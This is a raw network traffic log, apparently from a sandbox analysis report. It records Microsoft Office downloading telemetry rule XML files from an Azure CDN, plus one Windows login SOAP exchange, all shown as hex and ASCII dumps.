                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:34 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                91192.168.2.54986713.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:34 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:34 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:34 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 502
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: f4a85f8f-401e-00ac-0701-270a97000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210234Z-16849878b78j5kdg3dndgqw0vg000000076000000000unge
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:34 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                92192.168.2.54986813.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:35 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:35 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:35 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 407
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 9cbc4178-801e-008f-12a3-262c5d000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210235Z-16849878b78zqkvcwgr6h55x9n000000050000000000fsq6
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:35 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                93192.168.2.54986913.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:35 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:35 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:35 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 474
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 4b1c8405-301e-005d-7701-27e448000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210235Z-16849878b786fl7gm2qg4r5y7000000005u000000000hgc8
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:35 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                94192.168.2.54987013.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:35 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:35 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 408
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 4814b401-401e-005b-1e73-279c0c000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210235Z-r197bdfb6b4c8q4qvwwy2byzsw00000005tg00000000fd1a
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:35 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                95192.168.2.54987113.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:35 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:35 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:35 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 469
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: ad4459d7-101e-007a-6a4c-27047e000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210235Z-16849878b78wv88bk51myq5vxc00000005tg00000000nfvs
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:35 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                96192.168.2.54987220.190.159.0443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:35 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                                Content-Length: 3592
                                                                                                                                                                                                                                                                                                                                Host: login.live.com
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:35 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:36 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Expires: Mon, 28 Oct 2024 21:01:36 GMT
                                                                                                                                                                                                                                                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                x-ms-route-info: C555_BAY
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: dfa7859d-5347-46c8-b8a9-bee632f98a5d
                                                                                                                                                                                                                                                                                                                                PPServer: PPV: 30 H: PH1PEPF0001B7B6 V: 0
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:35 GMT
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Length: 11392
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:36 UTC11392INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                97192.168.2.54987313.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:36 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:36 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:36 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 416
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: bde7aa86-f01e-0052-08e5-279224000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210236Z-17c5cb586f6hhlf5mrwgq3erx800000006u0000000008n3s
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:36 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                98192.168.2.54987413.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:36 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:36 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 472
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 933aac65-d01e-007a-51aa-26f38c000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
